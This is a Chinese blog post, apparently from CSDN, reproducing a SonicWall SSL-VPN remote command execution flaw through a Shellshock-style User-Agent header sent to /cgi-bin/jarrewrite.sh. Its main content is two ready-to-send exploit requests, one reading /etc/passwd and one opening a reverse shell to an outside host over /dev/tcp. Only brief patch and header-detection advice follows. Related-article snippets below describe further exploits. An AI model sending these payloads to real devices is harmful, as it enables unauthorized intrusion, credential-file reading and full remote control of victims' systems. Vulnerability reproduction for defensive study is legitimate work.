SonicWall远程命令执行漏洞

最新推荐文章于 2023-07-13 18:22:10 发布
最新推荐文章于 2023-07-13 18:22:10 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 网络安全 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/113360847
版权

 

SonicWall 远程命令执行漏洞

一、漏洞描述

SonicWall历史版本远程命令执行漏洞以及相关利用脚本。由于SonicWall 使用了旧版本内核以及HTTP CGI 可执行程序,攻击者可构造恶意其HTTP请求头,造成远程任意命令执行,并获得主机控制权限

二、漏洞复现

exp:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close

访问执行查看:cat /etc/passwd

执行反弹shell

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080  User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &" Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close

成功获取到shell:

简单的脚本尝试验证:

三、防护修补建议

通用修补建议

升级到 Sonic SMA 8.0.0.4

临时修补建议

针对 http header 进行检测

可能存在的特征字符串如下() { :; };

 

参考:

 https://my.oschina.net/u/4600927/blog/4927559

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

 

thelostworld-公众号
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SonicWall 远程命令执行漏洞
PeiQi的博客
01-26 3731
SonicWall SSL-VPN 远程命令执行漏洞 漏洞描述 SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞 漏洞影响 SonicWall SSL-VPN FOFA app=“SONICWALL-SSL-VPN” 漏洞复现 出现漏洞的文件为 /cgi-bin/jarrewrite.sh #!/bin/bash # jarrewrite.sh: # Script takes a jar/class file and a working dir
SonicWall SSL-V**远程命令执行漏洞
jammny
02-01 966
漏洞详情 SonicWall SSL-VPN 产品中使用了极为老旧的 Linux 内核和 HTTP CGI 可执行程序,该程序在处理 http 请求时,无法正确的解析 http header。该漏洞导致命令注入,远程攻击者通过注入命令可以轻松的获得nobody用户权限的控制权限。同时由于老旧内核的问题以及其中存在漏洞的可执行程序,攻击者可以轻易的提升权限并完全接管该服务器。 漏洞影响 Sonic SMA < 8.0.0.4 漏洞利用 POC: GET /cgi-bin/jarrewrit
漏洞情报 | SonicWall SMA100 多个漏洞通告
爱国小白帽
03-16 544
0x01 漏洞简介 Sonicwall:成立于 1991 年,主要进行全面互联网安全解决方案的设计、开发和生产,为广大的市场提供访问安全、增值安全服务和交易安全产品。 近日,360漏洞云监测到Sonicwall官方发布了旗下SonicWall SMA100产品多个漏洞安全通告,CVE编号包括CVE-2021-20017,CVE-2021-20018。 0x02 漏洞详情 CVE-2021-20017 SonicWall SMA100远程命令执行漏洞 漏洞描述:此漏洞允许经过身份验证的攻击者以’nobo.
SonicWall紧急提醒:速修复多个严重的认证绕过漏洞
最新发布
smellycat000的专栏
07-13 563
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今天,SonicWall 紧急提醒客户修复影响 Global Management System (GMS) 防火墙和 Analytics 网络报告引擎软件套件的多个严重漏洞Sonicwall 公司今天共修复15个漏洞,其中一些可导致攻击者在绕过认证后,访问运行 GMS 9.3.2-SP1或更早版本以及 Analytics 2.5.0-R7或更...
SonicWall 防火墙曝严重漏洞,有些设备仍无补丁
smellycat000的专栏
03-29 749
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全硬件厂商 SonicWall 修复了位于 SonicOS 安全操作系统中的一个严重漏洞,可导致拒绝服务攻击以及远程代码执行 (RCE)。该漏洞的编号为CVE-2022-22274,是一个栈缓冲区溢出漏洞,CVSS 评分 9.4。影响版本该漏洞影响适用于中小企业的 TZ 系列入门级桌面版下一代防火墙 (NGFW)、旨在...
SonicWall Secure Mobile Access REC漏洞分析
qq_40466372的博客
02-16 357
SonicWall Secure Mobile Access远程代码执行漏洞
SonicWall:速度修复这些严重的 SMA 100 漏洞
smellycat000的专栏
12-09 335
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全厂商 SonicWall 督促客户将 SMA 100 系列设备更新至最新版本,因为这些设备中存在多个漏洞,可导致远程攻击者完全接...
勒索团伙正奔向 SonicWall 设备
smellycat000的专栏
06-10 229
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士几个月前,网络犯罪团伙越来越多地攻击 SonicWall 设备,攻陷企业网络并部署勒索软件。这些攻击发生在源自思杰、F5、Puls...
CVE-2020-5135:SonicOS缓冲区溢出漏洞通告
爱国小白帽
10-17 1万+
360CERT [三六零CERT](javascript:void(0)???? 今天 0x01 漏洞简述 2020年10月16日,360CERT监测发现 SonicWALL官方 发布了 SonicOS的风险通告,漏洞等级:严重,漏洞评分:9.4。 SonicOS中存在缓冲区溢出漏洞远程攻击者可以利用该漏洞向防火墙发送恶意请求,最终导致拒绝服务(DoS)攻击,并潜在的执行任意代码。 对此,360CERT建议广大用户及时将Sonic OS升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻
一个简单的apache cgi-bin
weixin_33778544的博客
02-07 334
//在基于域名的虚拟主机配置文件上加上一条 [root@centos129 vconf.d]# cat nvhsot.conf <VirtualHost 172.16.148.129:80> ServerName www.zhoutao.name ScriptAlias /cgi-bin/ "/www/zhoutao.name/cgi-bin/" Do...
4000个厂商弱口令
热门推荐
课嗨教育的专栏
04-05 1万+
Product/Vendor Username Password Zyxel (ssh) zyfwp PrOw!aN_fXp APC UPS (web) apc apc Weblogic (web) system manager Weblogic (web) system manager Weblogic (web) weblogic weblogic1 Weblogic (web) WEBLOGIC .
MinIO未授权SSRF漏洞(CVE-2021-21287)
thelostworld
02-05 1万+
MinIO未授权SSRF漏洞(CVE-2021-21287) 一、漏洞简介 ​ 由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞 攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令漏洞无需用户验证即可远程利用 二、影响版本 MinIO < RELEASE.2021-01-30T00-20-58Z 三、环境准备&漏洞复现 Docker 安装minio: d...
Apache Druid 命令执行漏洞(CVE-2021-25646)复现
thelostworld
02-02 7800
Apache Druid 命令执行漏洞(CVE-2021-25646) 一、漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 二、影响版本 Apache Druid < 0.20.1 三、漏洞环境&漏...
x微E-Cology WorkflowServiceXml RCE
thelostworld
05-16 6087
x微E-Cology WorkflowServiceXml RCE‍‍一、漏洞描述泛微E-cology OA系统的WorkflowServiceXml接口可被未授权访问,攻击者调用该接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程代码执行。‍二、漏洞影响E-cology <= 9.0‍三、漏洞复现‍‍访问主页:POC:POST /services%20/WorkflowServiceXml HTTP/1.1 Accept-Encoding: gzip, deflate Content
CVE-2021-2109 Weblogic Server远程代码执行
thelostworld
01-21 4410
CVE-2021-2109 Weblogic远程代码执行 ​ 一、漏洞简介 Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0..
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞
thelostworld
01-29 4173
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞 ​ 一、漏洞简介 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 二、影响版本 Larav..
致远OA ajaxAction formulaManager 文件上传漏洞
thelostworld
01-14 3958
致远OA ajaxAction formulaManager 文件上传漏洞 一、漏洞描述 致远OA是一套办公协同软件。近日,阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。由于致远OA旧版本某些ajax接口存在未授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。 ​ 二、影响版本 致远OA V8.0、V8.0SP1 致远OA V7.1、V7.1SP1 三、漏洞复现 exp: POST/seeyon/autoinst..
用友GRP-u8 注入-RCE漏洞复现
thelostworld
12-05 3615
​用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一、漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 二、漏洞复现 SQL注入POC POST /Proxy HTTP/1.1Host:localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Ma...
sonicwall nat 配置
06-03
SonicWall 防火墙上进行 NAT 配置的基本步骤如下: 1. 登录 SonicWall 防火墙的 Web 管理界面,进入 Network 菜单下的 NAT Policies 页面。 2. 点击 Add 按钮创建新的 NAT 策略。 3. 在 General 选项卡中设置源地址、目的地址、目的端口等基本参数。 4. 在 Original Packet 选项卡中设置源地址、目的地址、协议类型、端口号等原始数据包信息。 5. 在 Translated Packet 选项卡中设置转换后的数据包信息,如 NAT 类型、目的地址、目的端口等。 6. 在 Services 选项卡中选择要应用此 NAT 策略的服务类型。 7. 点击 OK 按钮保存 NAT 策略配置。 需要注意的是,NAT 配置需要根据具体的网络拓扑和业务需求来设置,确保配置正确才能生效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值